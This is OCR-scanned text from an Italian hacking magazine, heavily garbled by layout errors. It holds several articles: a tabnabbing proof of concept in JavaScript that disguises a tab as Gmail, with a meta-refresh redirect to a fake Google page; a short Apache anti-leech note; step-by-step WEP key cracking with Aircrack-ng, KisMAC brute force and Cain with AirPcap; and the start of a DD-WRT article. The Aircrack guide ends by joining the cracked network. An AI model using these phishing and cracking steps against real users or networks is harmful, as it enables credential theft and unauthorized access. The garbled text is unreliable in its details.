funzione principale (inizio listato) si può notare che il codice 
registra due eventi nella finestra corrente (oggetto window): 


window.onblur = function(){ 
TIMER = setTimeout (changeItUp, 5000); 


} 


window.onfocus = function(){ 
if (TIMER) clearTimeout (TIMER); 


i; 


L'evento onblur entra in gioco quando la finestra del 
browser su cui il codice Javascript sta girando perde il focus. 
Se la perdita di focus è superiore a 5 secondi, viene invocata 
la funzione changeItUp che si occupa di cambiare al volo 
i connotati del sito attuale. In caso contrario (evento onfo- 
cus), ovvero se la finestra riottiene il focus, il timer viene re- 
‘settato in attesa che l'utente si allontani nuovamente dal tab. 
Osservate adesso più da vicino la funzione changeItUp: 


function changeItUp(){ 
if( HAS _SWITCHED == false ){ 
createShield(“*https://mail.google. 
com”); 
setTitle( “Gmail: Email from Google”); 
favicon.set (“https://mail.google.com/ 
favicon.ico”); 
HAS_SWITCHED = true; 
} 
} 


Se il passaggio dal sito originario a quello che l'attacker 
intende impersonare non è già avvenuto (cioè HAS_ 
SWITCHED == false) il codice dentro questa funzione 
svolge fondamentalmente tre operazioni: 


ereateShield() si occupa di cambiare i contenuti del 
sito. Tutto ciò che il codice di esempio fa, in questo caso, è 
di aggiungere un nuovo elemento <aiv> davanti ai conte- 
nuti esistenti in modo da oscurarli attraverso l'inserimento 
di un tag <img> che punti ad un'immagine raffigurante il 
sito Gmail. Ovviamente in uno scenario di attacco reale, 
occorrerà ben più che inserire una semplice immagine che 
raffiguri la pagina principale di Gmail. Trattandosi tuttavia 
di una dimostrazione vi dovrete accontentare. Sta a voi ti- 
rare fuori dallo skeleton di bgattack.js qualcosa di più 
di quanto già fa, se siete interessati. Tornando al sorgente 
Javascript, setTitle() è invece la funzione preposta a 
cambiare il titolo della pagina. Ciò avviene semplicemente 
alterando la proprietà title dell'oggetto document: 


function setTitle(text){ document.title = 
text; } 


Il metodo set della classe user-defined favicon viene infine 
utilizzato per sostituire l'icona attuale del sito con quella origi- 
nale di gmail, inmodo da dare una parvenza più reale al tutto. 


Conclusione 


Ad aver parlato pubblicamente per la prima volta di tabnab- 
bing, avendone dimostrato tra l'altro l'efficacia con il Proof 
Of Concept bgattack.js, è stato Aza Raskin. Lo stesso 
Raskin, tuttavia, ammette che l'attacco presenta delle li- 
mitazioni umane e tecnologiche che vale la pena 
menzionare a beneficio dei nostri lettori. Ovviamente la 
sua efficacia (e probabile riuscita) è direttamente propor- 
zionale al numero di tab con cui la vittima sta interagendo 
nel momento in cui viene attaccata (più ce ne sono aperti, 
maggiori sono le possibilità che la sua mente possa con- 
fondersi in fase di switch). Per quanto riguarda il vincolo 
tecnologico invece, per poter funzionare correttamente, 
l'attacco necessita che Javascript sia attivo sul browser di 
chi visita il sito. Come osservato da qualcuno, nell’eventua- 
lità in cui il supporto Javascript sia per qualche motivo stato 
disattivato (molto improbabile, ma possibile) un attacco si- 
mile, sebbene non con lo stesso livello di controllo offerto 
dalla registrazione degli eventi onblur ed onfocus, può 
essere implementato in modo più grezzo utilizzando un 
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HTML meta refresh tag come di seguito mostrato: 


filename: test.html 

<html> 

<head> 

<meta http-equiv="refresh” 
content="15;url=http://sito/pagina/finta/goo- 
gle.html"> 

</head> 

<body> 

Il contenuto momentaneo del sito va qui. Il 
redirect scatterà tra 15 secondi ma senza 
controllo sulla perdita o l'acquisizione di 
focus del tab 

</body> 

</html> 


opportuno considerare, comunque, che le versioni più re- 


centi dei principali browser, per impostazione di sicurezza 
predefinita, ignorano la presenza del tag meta refresh. 


sato dagli spammer e da chi promuoveva siti di phishing, 
tanto che i motori di ricerca in alcuni casi si rifiutato oggi 
di indicizzare pagine HTML che contengono questo tag. 


/lonw qui DO; 
APACHE - ANTI- LEECH i 


LA na 0 1 MOST » 


SECURITY 

OVVERO COME 
PROTEGGERE | FILE 
A_DISPOSIZIONE 
DEGLI UTENTI (E DEI 
MALINTENZIONATI) 
SU UN SERVER 
PUBBLICO. 


(UAN 


sasa 


a protezione dei nostri E 
file su server pubblici i; Ù ERRORI POSSIBILI 
è davvero importante 
e necessaria non 
tanto in primo luogo Se lo script non funziona e non 
|per la protezione e la ci permette mai di scaricare il file 
non duplicazione dei contenuti verifichiamo il log degli errori di 
da parte di terzi, ma sopratutto ‘apache. 
per chi effettua link a nostri file In questo modo, nel caso in cui Un possibile errore: 
|\\\ presenti generando traffico e banda la richiesta non provenga da una 
sul nostro sito. Una soluzione pagina del nostro sito (http:// 
rapida ed efficace è da ricercare nostrosito.it/pagina.htm) Apache 
nel modulo mod_rewrite che visualizzerà l’errore 403. 
permette di riscrivere le condizioni Ecco una variante per proteggere 
al volo (onTheFly). Lo script da tutti files. 
implementare è molto semplice. 
Gonsiste nel verificare il referer della 
richiesta HTTP e di confrontarlo ostrosit 
con quelli inseriti nella condizione, 4 
successivamente si può impostare In questo caso verifichiamo che in 
la tipologia di file a cui, questa httpd.conf non sia commentata la riga: 
condizione, deve essere applicata. C 
Mettiamo il caso che un’ immagine si 
| trovi http://Awww.nostrosito.it/img.gif 
Imposteremo i referer in questa 
maniera: 
| files vanno creati con un editor di 
testo e salvati come “.htaccess” (# commento) 


= 


ual è il grado di 
sicurezza di una 
rete Wi-Fi? Secondo 
i più esperti in 
materia basta circa 
un minuto per scovare la chiave 
di accesso di una rete wireless 
protetta dal noto metodo WEP. 
Poiché non sono poi così tante 
le modalità di protezione di una 
rete internet (Wireless) è più facile 
per gli “scrocconi” accedervi o 
perlomeno portare degli attacchi 
mirati.. 
Per chi non ne fosse a 
conoscenza i metodi di 
protezione di una rete Wi- 
Fi sono soltanto due: WEP e 
WPA. La modalità di protezione 
che al momento dà maggiore 
sicurezza è la WPA anche se 
quella largamente più utilizzata è, 
invece, la WEP. 


WEP E WPA 


Prima di illustrare i programmi 
usati maggiormente 
approfondiamo il significato di 
queste due sigle WEP e WPA: 
* WEP: corrisponde a Wired 
Equivalent Privacy, fa parte 
dello standard IEEE 802.11, 
specifico per rendere “sicuro” 
l’utilizzo delle reti Wi-Fi.Poichè 
questa chiave di protezione 
con il tempo si è rivelata ormai 
scarsa in termini di protezione è 
stata progettata la chiave WPA 
presente dal 2003. Questa usa 
l'algoritmo di cifratura stream 
RC4 per la sicurezza e CRC-32 
per l'integrità dei dati. 


SOTTO ATTACCO 


iù) 


* WPA: che corrisponde a Wi-Fi 
Protected Access è il protocollo 
realizzato per colmare le falle del 
precedente, più sicuro ma con 
ancora diversi difetti. Il protocollo 
TKIP cambia dinamicamente la 
chiave in uso e la combina con 
un vettore di inizializzazione (IVS) 
di dimensione doppia rispetto 

al WEP (in modo da rendere 

vani gli attacchi simili a quelli 
previsti per il WEP) e può essere 
implementato nelle schede di 
interfaccia wireless pre-WPA, 
che cominciarono ad essere 

{ distribuite nel 1999, attraverso un 
‘aggiornamento del firmware. 

* WPA2: ancora poco usata, è 

la nuova chiave che dovrebbe 
sostituire la “vecchia” WPA. 

Per “rubare” una chiave WEP non 


E 


c’è bisogno di essere un esperto 
informatico, bastano alcuni 
strumenti e qualche programmino 
in grado di intercettare i pacchetti 
che vengono trasmessi e 
decriptarli, naturalmente più 
pacchetti vengono captati più 
sono le possibilità di arrivare 
all'obiettivo. 


AIRCRACK 


Tra i programmi più usati abbiamo 
AirCrack scaricabile da questo 
indirizzo: 
http://downloads.phpnuke.org/it/ 
download-item-view-a-b-m-g-x. 
htm 

Aircrack-ng è un pacchetto che 
permette di recuperare password 
dalle reti 802.11 WEP, WPA e 
WPA2-PSK. Il programma funziona 
in modo semplice, acquisisce 

i pacchetti che circolano sulla 
rete controllata ed esegue le fasi 
tradizionali di recupero: brute 
force, dictionary ecc. 

Inoltre, include gli strumenti 
necessari per ripristinare 
velocemente l’accesso a una rete 
senza fili. 


Vi 


I SFERRI DEL 
MESTIERE” 


Eseguiremo l'applicazione dal 
prompt di DOS: per poter eseguire 
il programma anche se non siamo 
nella directory che lo contiene, 
cliccate col tasto destro del 
mouse su “Risorse del computer, 
Proprietà, Avanzate, Variabili 


scritte altre variabili d'ambiente, 

. inserite un punto e virgola (“;”) e 
scrivete il percorso in cui si trova 
il programma. 

| Avrete anche bisogno di installare (l 
dei nuovi driver per il vostro 
adattatore di rete: i driver originali 

. non sono stati pensati per fare 
cose simili (per trovare dei driver 
che possano fare al caso vostro A 
visitate il sito WildPacket online |. 
su www.wildpackets.com). i 
Per installare i nuovi driver: 
“clic destro su Risorse del > 
Computer, Proprietà, Gestione 

| Periferiche, clic destro sul vostro 

|. adattatore di rete, Proprietà, 
Driver, Aggiorna Driver, Installa da 
un elenco o percorso specifico”. 
Scegliete il percorso in cui avete 
scaricato i driver. Assicuratevi, 

| infine, che il vostro adattatore di 
rete sia ora compatibile col tutto 


n 


Il primo passo è ovviamente 
quello di trovare una rete 


MINER 


pa 
34Mbps Wireless Acc e 


PWR » 


Wireless. 
Digitate “Airodump” nel prompt 


| del DOS (Start, esegui, cmd). 


Vi comparirà una finestra 
contenente le schede di rete 
trovate sulla vostra macchina. 
Notate che accanto al nome 
delle schede di rete è presente 
un numero identificativo. Ad 
esempio: 


È 14 NETGEAR WGSI1T 54 Mbps 


Wireless PC Card 
22 NETGEAR WAGS11 802.11a/ 
b/g Dual Band Wireless PC Card 


In questo caso digitate 22, 


il numero identificativo della 


scheda che ci interessa utilizzare. 


| Oravi viene chiesto di indicare 


il chipset utilizzato dal vostro 
‘adattatore di rete. Ad esempio: 


Interface types: ‘o’ = Hermesi/ 


. Realtek 


‘a’ = Aironet/Atheros 


Quindi vi sarà richiesto di 


WIAN ay 


Ss P 


inserire il numero del canale da 
controllare (sniffing). Per l'Europa 
il 14. Se volete fare una scansione 
di tutti i canali utilizzate lo zero. 


In seguito il programma chiederà 
di digitare il nome da dare al file 
che verrà creato a partire dalla 
scansione del canale. Digitate il 
nome che vi pare, ad esempio 
“WEPO1”. 


A questo punto Aircrack vi 
chiederà se salvare gli interi 
pacchetti catturati o soltanto gli 
IV. Per craccare una chiave WEP 
vi basta salvare semplicemente 
gli IV (il che vi farà risparmiare 
diverso spazio sull’hard disk, 
quindi digitate “y”). 


Adesso vedrete una schermata 


| simile: 


SOTTO ATTALE 


3, 


Oa nt a 


#, 


BSSID = l'indirizzo MAC 
dell’Access Point. 


PWA = indica la forza del segnale 
che si sta ricevendo. 


BEACONS = sono pacchetti 
“in chiaro” che l’Access Point 
trasmette sostanzialmente per 
dire “sono un access point, 
collegati a me”. 


DATA = è quello che ci interessa: 
sono gli IV che Aircrack utilizzerà 
per trovare la password WEP. 


ENC = il tipo di incapsulamento: 
WEP, WPA, OPEN... 


ESSID = Il nome della rete 
Wireless. L'SSID è una sorta di 
identificativo della rete. Se ad 
esempio l’Access Point ha come 
SSID il nome “pippo” allora le 
schede wireless che si vogliono 
connettere devono impostare a 
loro volta come SSID “pippo”. 
Nella seconda parte 
dell'immagine, sopra, vediamo 

i vari client che stanno 
“dialogando” con l’Access 
Point", più esattamente vediamo 
i vari indirizzi MAC dei client. 
Quest'informazione può 
risultare utile in seguito 
quindi bisogna ricordarsi 
tutto. Ciò significa che 
anche se possediamo 

la chiave WEP 
non possiamo 
accedere 
all’Access 
Point a meno 
che l'indirizzo 
MAC del 


nostro 

f adattatore 
di rete non sia 
stato impostato nel 
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Na 


filtro dell'Access Point. 

Aicrack continuerà a collezionare 

IV finché non lo fermate. Più 

IV scaricate e più possibilità 

avete di decifrare la chiave. 

Aircrack dovrebbe trovare la 

chiave in pochi secondi. Per una 

chiave da 104 bit collezionate 

circa 2.000.000 di IV: a volte ne 

bastano molti meno, 

altre volte purtroppo 
dovrete scaricarne di 
più. 
Quando sarete 
soddisfatti del 
numero di IV 
collezionati premete 
“CTRL + C" per 


fermare il programma. 


Scrivendo “Aircrack- 
ng” nel prompt vi 
verrà mostrata la 
lista dei parametri 
che è possibile 
utilizzare. Per 
esempio, se 
‘abbiamo scaricato 
intorno ai 400.000 IV, 
in genere sufficienti 
per scovare una 
chiave WEP da 40 
Ni 


“en 


" 
ti! 


bit, allora digitiamo il comando 
“aircrack-ng -n 64 WEP1.ivs”. Con 
il parametro “-n 64” diciamo al 
programma che la chiave ha una 
lunghezza massima di 64 bit e di 
non provare quindi oltre. 

Se riusciremo nell'intento, il 
programma ci restituirà un 
messaggio di “KEY FOUND” 
seguito dal nome della chiave. 
Ora che avete la chiave utilizzatela 
proprio come se doveste 
connettervi ad una vostra 

rete “domestica”. Se l'SSID 
dell’Access Point è abilitato 
seguite questo passo. 


Premete su Start, Connetti 
a, Connessioni di rete 
senza fili, Visualizza reti 
senza fili disponibili. Se 
l'SSID è abilitato, questo vi 
appare nella finestra delle 
connessioni disponibili. 
Fate doppio clic sull'icona 
della connessione ed 
inserite la password 
che avete trovato in 
precedenza: missione 
compiuta. 


li utenti Mac sono 
spesso un po’ 
discriminati in tema 
di hacking. Da una 
parte possono a pieno 
titolo vantarsi di avere 

x} dei computer poco soggetti a Virus, 

i Trojan, Malware e tutto quanto rientri 

hell’arsenale del perfetto hacker. 

Dall'altra sono, di fatto, sprovvisti loro 
stessi del suddetto arsenale: ovvero 
non hanno gli strumenti per cercare 
di realizzare qualche piccolo attacco, 
anche solo per testare l'efficacia della 
propria rete o delle difese collegate. 
Colpa della scarsa diffusione dei 

Mac rispetto ai PC/Windows, 

che rappresentano la stragrande 
maggioranza dei computer in 


commercio e, proprio per questo, 
finiscono per attirare l’attenzione dei 
malintenzionati. Ovvero, la troppa 
popolarità spesso può essere 

‘anche pericolosa, ma l'isolamento 
non favorisce il proliferare di idee e 
tecniche di sviluppo. Ma questo è 

un discorso fatto già altre volte e un 
po' ritrito. Semmai in questo articolo 
vogliamo segnalare un'eccezione che 
conferma la regola, ovvero un ottimo 
sniffer/scanner wi-fi per Mac che 
rappresenta una valida alternativa a 
Kismet e altri scanner disponibili in 
ambiente Windows/Linux: KisMAC. 
KisMAC è completamente gratuito, si 
può scaricare all'indirizzo http://trac. 
kismac-ng.org. Funziona benissimo 
coi portatili dotati di scheda airport 


S 
= HACKING/FACILE 


SCANNING 


COME TROVARE 
LA PASSWOR 
DI ACCESSI 
INTERNET WI-FI 
PROTETTI IN 
POCHI SEMPLICI 
MOSSE... 


integrata che consentono di spostarsi, 
in piena mobilità, alla ricerca di reti 
wi-fi attaccabili. Per testare l'efficacia 
di KisMAC abbiamo provato a 
utilizzarlo in ambiente 
MacBook Pro che si è tras 
un potente scanner portatile 


QUALCHE 
SETTAGGIO 


Prima di iniziare il nostro attacco 
dobbiamo selezionare i driver della 
scheda Wi-Fi integrata attraverso il 
pannello delle Preferenze (Figura 1). 
Nel nostro caso si tratta di una scheda 
Airport Extreme. 
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INIZIAMO 


La versione utilizzata è la 0.3.2. Una 

volta lanciato KisMAC mostra la finestra 
SI principale che risulta assolutamente 
vuota (Figura 2). La nostra attività di 
scanning di pacchetti Wi-Fi, ovvero di 
intercettazione di pacchetti dati che 
transitano attraverso una rete wireless, 
non è ancora iniziata. Per avviaria 
dobbiamo premere Start Scan, nella 
parte inferiore destra della finestra 
principale. La manopola ancora più a 
destra inizierà una sorta di impercettibile 
movimento rotatorio. Segno che 
KisMAC sta lavorando per voi! 
Ma prima di attivarsi KisMac chiede 
di autenticarsi come amministratore 
(Figura 3). 


DATI 


DATI DOPO 


KisMAC individua tutte le reti Wi-Fi nel 
raggio di azione della scheda Airport 
integrata e inizia a fare lo scanning 

dei pacchetti dati. Il nome delle reti 
disponibili appare nella colonna 

SSID. Qui per ovvi motivi li abbiamo 
cancellati. L'attività di raccolta dati 
deve procedere per diversi minuti. 
Infatti, per potere cercare di portare 
un qualsiasi tipo di attacco bisogna 


http://trac.kismac-ng.org. 


collezionare un quantitativo minimo di 
pacchetti dati. 


UN ATTACCO 
DI PURA “FORZA 
BRUTA” 


Come si può notare dalla nostra 
schermata (Figura 4) sono state 
individuate diverse reti, alcune con 
chiave di protezione WEP, altre con 
chiave di protezione WPA e WPA2. 
Evidentemente le reti WEP sono più 
vulnerabili ed è proprio su queste che 
concentreremo il nostro attacco. Dopo 
diversi minuti di intercettazione di 
pacchetti dati possiamo verificare se 
abbiamo elementi sufficienti per sferrare 
il nostro primo attacco. Proviamo a 
selezionare una rete Wi-Fi (tra quelle 
WEP) dal menu Network e proviamo a 
portare un attacco di pura forza bruta, 
ovvero un tipo di attacco che cerca di 
scovare la password forzando centinaia 
di combinazioni di lettere e parole al 
secondo. 


Network>Bruteforce>alphanums 
(e 


In questo caso abbiamo scelto un 
attacco in grado di rivelare una 


KisMAC è completamente gratuito, si può scaricare all’indirizzo 


password alfanumerica a 40 bit 
(Figura 5). 

Se la quantità di dati è insufficiente 
per sferrare l'attacco comparirà un 
avviso che informa l'utente come sia 
necessario acquisire più dati prima 
di procedere. L'attacco può durare 
diversi minuti, la scansione viene 
visualizzata su una barra che si colora 
progressivamente di azzurro (come 
si può osservare dalle figure 6 e 7 
presenti nella pagina successiva). 


LA PASSWORD 


Dopo circa un’ora KisMAC ha svelato 

la password di una delle reti WEP 

(Figura 8). Basta selezionare il pannello 
Proprietà (premendo il pulsante a forma 

di ingranaggio nella parte inferiore della 
finestra) per visualizzarla in corrispondenza 
della riga ASCII Key. Nel nostro caso 

era una banalissima password di sole 
cinque lettere, senza numeri, praticamente È 
una delle password che gli esperti di 
sicurezza giudicano molto debole. In 
genere si consiglia di inserire non solo 
lettere ma anche numeri e di aumentare 
sensibilmente la lunghezza complessiva 
della password per aumentare il numero È 
di combinazioni da forzare in un attacco 
“brute force”. Naturalmente nella 
schermata abbiamo cancellato tutti i dati 
relativi alla rete Wi-Fi utilizzata per la nostra 
dimostrazione. 

Nella pagina seguente trovate le 
schermate di tutto l'attacco con le relative 
descrizioni passo dopo passo. 

Buono “sniffer” a tutti! 


di 


Capture devices 
Apple Airport or Airport Extreme card, active mode 
Apple Airport Extreme card, passive mode 


Kismet Server, Passive Mode 


Channel Hopo:ng 


Dump Filter 


Start Channel 


Global Settings 


Hopping Frequency 


Figura 1: Prima di iniziare il nostro attacco dobbiamo 
selezionare i driver della scheda Wi-Fi integrata. 


= Figura 2: 
Per avviare 
lo scanning 
dobbiamo 
premere 
Start Scan, 
nella parte 
inferiore destra 
della finestra 

$ principale. 


ESATA RI 


Figura 8: Prima di attivarsi KisMac chiede di autenticarsi 
come amministratore. 


Figura 4: KisMAC individua tutte le reti Wi-Fi nella raggio di 
azione della scheda Airport e inizia a lo scanning. 


Figura 5: Selezioniamo dal menu: Network>Bruteforce> 
alphanums against 40-bit. 


sec guisa MEP aptanumer 


Figura 7: ...la scansione viene visualizzata su Una barra che 
sì colora progressivamente di azzurro. 


SSN 
Figura 8 Dopo circa un'ora KisMAC 
di una delle reti WEP. 
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notizia di questi giorni, 
durante la stesura di 
questo articolo (novembre 
2010) che il Consiglio 
dei Ministri ha dato 
via libera a diverse 
misure contenute in un decreto 
legge : dalla possibilita’ di espellere 
cittadini comunitari alla stretta contro 
prostituzione e accattonaggio alla 
liberazione delle reti wi-fi . In questo 
caso, mi sento in dovere di dire 
che non sono molto d'accordo. 
Uiberalizzare le reti wi-fi significa 
inanzitutto rendere “anonima” ogni 
connessione ad internet, e proprio 
perché anonima,.ci'troveremo di. 
fronte ad una serie-diteati a cui non 
potremmo identificare.iLcolpevole. 
E! purverò'che anche oggi c'è la 
cus possibilità. di commettere reati su 
internet senza sapere l’autore;ma' 
‘son'convinto che dal 1 gennaio 2011 
ere questi reati si moltiplicheranno a 
dismisura. Ma questo non è il peggio 
... Si puo verificare che colui che 
commette un reato informatico, 
lo fa sfruttando il vostro router o 
IT access point se non configurato 
correttamente. In questo caso potrete 
trovarvi la polizia postale alla porta 
senza che voi ne sappiate niente, 
poiché lascerà come “biglietto da 
| visita” il vostro indirizzo IP, che è un 
numero univoco che corrisponde 
alla vostra persona. | reati sono 
molteplici, anche se la maggioranza 
TM dei casi riguarda il furto di denaro. Non 
| tralascei 


casi, sfruttando Skype, un programma 

|| che permette di telefonare via internet, 
gli scenari potranno essere ancora piu 
complessi. 


TROVARE 
UN ACCESS POINT 
LIBERO 


Trovare un access point libero è 
facilissimo, non bisogna essere 
hacker ne essere afferratissimi in 
materia. Ogni utente di pc portatile 
‘avrà sicuramente provato a vedere 
o scovare le connessioni attive della 
sua zona, e molto spesso, oltre alla 
propria, ne avrà trovato anche altre: 
alcune opportunamente protette, 


i i reati a contenuto sessuale, 
per di più, pedo-pornografico. In alcuni 


altre... libere. Sfruttare le connessioni 
altrui, è reato, ma a volte ci si lascia 
prendere dalla curiosità e.... questo 
non va bene. Addirittura in alcune 
città, vengono segnalate con vernice 
‘spray sui muri degli edifici , il punto 
ottimale per raggiungere una rete 
libera wi-fi. Con la nuova Legge, 
molto probabilmente, non ci sarà piu 
bisogno. 


SCOPO DI QUESTO 
ARICOLO 
armani nina 


Ovviamente,.come-detto în 
«precedenza, lo scopo di questo 
articolo è quello di.verificare se la 
vostra rete sia protetta al punto giusto. 
Proteggere una. rete.al.100.per:100 
ion è semplice, se non impossibile. 
Bisogna inanzitutto conoscere il 
malintenzionato ed il suo grado di 


conoscenza delle reti. Molto spesso, 
per esperienze personali, abbiamo a 
che fare con dei LAMER. Un lamer è 
un aspirante cracker con conoscenze 
informatiche limitate. Il termine inglese, 
usato in genere in senso dispregiativo, 
potrebbe essere l'equivalente 

in italiano di “ principiante”. Da 

qui, proteggere anche in maniera 
‘approssimativa un access point, può 
risultare utile. Ma non sempre è così, 
esistono anche persone capaci di 


violare un sistema semplicemente 

per il gusto di farlo, e più è difficile, 
più gusto ci provano. Saltando la 

fase che permette di proteggere il 
vostro router, iniziamo a conoscere un 
dispositivo interessante per verificare 
la protezione, l’analisi, e la risoluzione 
dei vostri problemi. 


A n 
SE nni 
AIRPECAP NX dimmi 


Dalla CACE Technologies, azienda i ina 
‘americana ma con il 70 per 100 di 
personale italo-americano, abbiamo 
provato un kit che comprende una 
parte hardware ed una software per 
verificare la sicurezza della vostra 

rete o access-point wi-fi. La parte 
hardware consiste in un adattatore 
usb che funge da ricetrasmettitore con 
possibilità di attaccarci le due antenne 
esterne fornite di serie (oltre alle. due 


interne) per migliorare le prestazioni in 
‘ambienti più esigenti. La possibilità 
di gestire due bande di frequenza 

(la 2,4 e la 4,9 ghz) rende questo 
‘adattatore universale. La particolarità 
che invece lo rende unico nel suo 
genere, è la possibilità di iniettare dei 
pacchetti preconfezionati nella rete 
by-passando lo “stack” di controllo. 
Questa tecnica è molto usata tra gli 
hacker, permettendo loro di introdursi 
nei sistemi informatici molto piu 


facilmente. La parte software è molto 
valida. Nel cd incluso nella confezione 
possiamo trovare programmi che 

ci aiutano a sfruttare al massimo le 
potenzialità del rice-trasmettitore 

usb. Wireshark, è un programma che 
permette la cattura e la decodifica 

dei dati wireless in piu canali 
simultaneamente oltre a quelli della 
rete ethernet, Cain invece, è ottimo per 
attacchi diretti con crittografie wep e 
wpa wpa2 con possibilità di iniettare 
pacchetti dati costruiti ad hoc. A 
completare la suite programmi ci sono 
Airerack-Ng, Kismet, Ngrep, Windump 
il cui scopo è quello di analizzare i 
protocolli, monitorare la rete.(sniffet); 
generare traffico (packet iniection), 
diagnostica e “intrusion detection”. 
Alcuni di questi strumenti sono molto 
conosciuti dagli hacker e questo 

ci permette di adeguare le nostre 
contromisure al fine di avere una rete 
super protetta. Pensare di spiegare in 
poche righe come funziona una rete o 
come sfruttare tutti i suoi punti deboli, 
gli algoritmi WEP, WPA ecc, è cosa 
impensabile.Tuttavia, ho riportato qui 
sotto, un attaccovalla mia (ripeto, mia!) 
rete wireless abilitando la crittografia 
WEP e togliendo alcune protezioni 
(che di solito lascio) con il programma 
CAIN e ovviamente la scheda AîtPcap' 
NX. Ciò per dimostrare quanto sia 
facile con pochi strumenti ed in pochi 
secondi, violare una rete e prenderne 
il controllo. 


ATTACCO 
ALLA MIA RETE 


Il mio router è un Drytek . Per prima 
cosa devo togliere tutte le protezioni 
che ho installato e modificato a 

mio piacimento. Quindi procedo 
collegandomi all'indirizzo 192.168.1.1 
e avrò in formato html la possibilità 

di cliccare sull'apposito pulsante per 
ripristinare le impostazioni di fabbrica. 
Questo per poter valutare un attacco 
‘ad un router nelle vostre stesse 
condizioni iniziali. Fatto questo, salvo 
le impostazioni e riavvio il router. A 
questo punto inizio con l'attacco vero 
e proprio, Esistono nel pacchetto 
della CACE Electronics, come già 
‘accennato, due programmi adatti allo 
scopo. Wireshark e Cain. Abbiamo 
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deciso di provare Cain soprattutto per 
la sua semplicità, poiché Wireshark, 
oltre a decifrare le chiavi web/wap/ 
wap2 è improntato anche per una 
‘analisi dei dati. Aquesto punto, 
mando in esecuzione il programma: 
CAIN e clicco sulla parte “Wireless”. Di 
default il programma vi darà la vostra 
Scheda di rete, cambiatela scegliendo 
AirPcap00 come mostrato qui.sotto. 


Noterete sulla parte sinistra due 
diciture importanti. “Wep injection, 
ARP request” e “Capture Wep.IV...”. 
Queste devono essere tutte e due 
selezionate in modo tale da iniettare 
dei'pacchetti, e successivamente 
catturarli. Diamo inizio alla ricerca del 
canale della nostra rete, cliccando 
sul pulsante “Active Scan”. Questo 
pulsante invierà appositi pacchetti su 
tutti i canali o frequenze della gamma 
2,4 ghz e 5 Ghz catalogandoli per 
numero progressivo. Il risultato sarà 
simile a quello della figura seguente. 


Cercate a questo punto il nome della 
vostra rete dalla lista e appuntatevi 
ilmumero del canale. Stoppate 

lo scan e dalla dicitura “Lock on 
channel” selezionate il vostro canale 
di trasmissione. Questo serve per 
indirizzare i pacchetti solo sulla 
frequenza del vostro router dove 

in questa maniera  velocizzeremo 
l'invio dei pacchetti. A questo punto, 


clicchiamo nuovamente sul pulsante 
“Active scan”.e rimaniamo in attesa 
di vedere quello che'stiecede sotto 
le “colonne” Packet e Unique WEP: 
IV's. La prima colonna visualizza il 
numero dei pacchetti inviati al vostro 
router, mentre nella seconda, la piu 
importante, sarà 


visualizzato il numero delle chiavi 
wep ricevute. Per poter decriptare 
una chiave wep abbiamo bisogno 
di almeno 3000 “Unique Wep Ivs” e 
con una buona connessione ed un 


ALII 


Uli 


Une 


n 
Sl 
Miki 


pc recente siamo in grado di farlo in 
meno di 10 minuti. Una volta raggiunto 
il numero necessario delle chiavi, 
cliccate su “analize” scegliendo uno 
tra i 2 modi proposti per decrittare la 
chiave. 

A questo punto attendete il risultato 
che arriverà entro pochi secondi. 


CONTROMISURE 


ima contromisura da prendere 
per rendere sicura una rete, è quella 
di essere invisibili. Non inserite 
nomi riconducibili a'voî nella parte 


riguardante l’identificazione della 
retewInsefite nomi straniso parole 
senza:serisò € non fate l'errore che 
po la maggior. parte-degliuitente fa, 
“inserendo nome e cognomesPiùr 
"ai l'è meglio è. Seconda cosa, 
configurare in modo opportuno il 
— vostro router cambiando innanzitutto 
le credenziali di default per l’accesso. 
La maggior parte dei router o non 
hanno la password o è “Admin”. 
Fatto questo è buona regola abilitare 
l'accesso alla vostra rete abilitando il 


Miki, 


filtro del MAC Address del vostro PC. 
In questo caso avete ottime possibilità 
di protezione, anche se ad un vero 
hacker basta una sola riga di codice 
(in lìinux) per scavalcare la protezione. 
(spoofing). Successivamente potrete 
disattivare il SSID broadcast, 
disattivare il “server dhcp”,attivare 

i nuovi sistemi di crittografia, quali 
WPA e WPA2, cambiare la gamma di 
indirizzi IP standard(192.168.1.1). Un 
ultima cosa, anche se sembra banale, 
NON lasciate il router acceso quando 
non viene utilizzato. 


I 
CONCLUSIONI. 
BLAZE Tver 


Abbiamo visto in questo articolo 
come sia facile penetraremnelle 
Connessioni wireless. Tuttavia, 
esistono molte protezioni.in merito 


che creano la vita difficile ad.un....... 


eventuale intruso. La rete wireless 
non è sicura per niente, bisogna 
avere la fortuna di non trovare un 
“appassionato” o una persona 

in gamba che abbia voglia di 
accedere alla vostra rete per il 


“pacchetto wep e viene utilizzato in 


solo gusto di farlo. Il Kit AirPcap è 
un'arma a doppio taglio, ma risulta 
un ottimo strumento per capire ed 
esplorare le regole delle reti cablate 
CAVIOESSA 


stat 
punt pari 
ba sapri Mb 
TERMINI 
UTILIZZATI 
(iii sie ps 
SSID (service set identifier): è un 
identificativo che ci permette di 
Ver Î Giannone, 
distinguere un access point fo 
siii sim 


WEP (Wired Equivalent Privacy) 
algoritmo ideato per la crittografia 
dei dati nelle reti wireless 
basandosi su una chiave segreta 
condivisa. 

IV (initialization Vector): fa parte del 


combinazione con la chiave segreta 
per criptare i dati MAC (Media 
Access Control);.indirizzo.hardware 


I 
che identifica in modo univoco 
ciascun componente della rete. 
AP (access point): punto di accesso 
alla rete solitamente composto da 
un router (hardware) dedicato»che. I 


può essere anche wireless. 


ligioi 
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LIBERA IL ROUTE 


ADDIO. 


L'OPEN SOURCE E IL 


FUTURO DI QUALSIASI APPLIANCE. 


outer, Access Point 
e simili sono forse i 
dispositivi più venduti in 
assoluto: ne sono pieni 
| negozi specializzati e 
persino i supermercati. 
La maggior parte degli utenti resta 
perplessa davanti alla scelta di 
'i{{| dispositivi perché tutti sembrano 
uguali tra loro e persino i prezzi sono 
| molto simili. Per esempio, a parità di 
prestazioni, la differenza di prezzo 
? tra un Repeater e un Access Point 
difficilmente supera i 10 euro. Dal 
punto di vista dell'hardware, invece, è 
inutile cercarle: non ci sono differenze 
pratiche. Eppure, per questioni di 
marketing, i produttori distinguono 
questi accessori e difficilmente un 
" Access Point potrà essere usato come 
Repeater perché il software interno 
non lo permette. Lo stesso vale per le 
potenze di trasmissione: per rispettare 
le leggi,.i produttori le limitano via 
software, anche se (magari) il nostro 
È router funzionerà in un'area totalmente 
| privata, in cui possiamo decidere 
| autonomamente questa impostazione. 


ALTERNATIVA 


Un'alternativa al sempre limitato 
firmware fomito dai produttori è DD- 
WRT, un firmware Open Source basato 
su Linux che negli utlimi tempi è arrivato 
‘a supportare pienamente oltre 200 
dispositivi WLAN. Il meccanismo è 
abbastanza semplice: ogni hardware 
